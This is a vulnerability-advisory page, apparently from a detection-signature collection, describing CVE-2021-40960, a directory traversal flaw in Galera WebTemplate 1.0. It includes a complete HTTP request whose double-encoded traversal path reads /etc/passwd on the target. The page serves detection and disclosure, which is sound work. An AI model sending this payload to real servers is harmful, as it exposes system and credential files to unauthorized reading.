🔙 목록으로 돌아가기

CVE-2021-40960: Galera WebTemplate 1.0 Directory Traversal

TitleGalera WebTemplate 1.0 Directory Traversal
Authordaffainfo
SeverityCritical
ImpactAn attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
RemediationApply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.
CVSS Score9.8
EPSS Score0.81807
CVE IDCVE-2021-40960
CWE IDCWE-22
Tags cve2021 cve lfi galera vuln

🔍 Vulnerability Description

Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

🌐 HTTP Request

GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-40960.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-40960.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A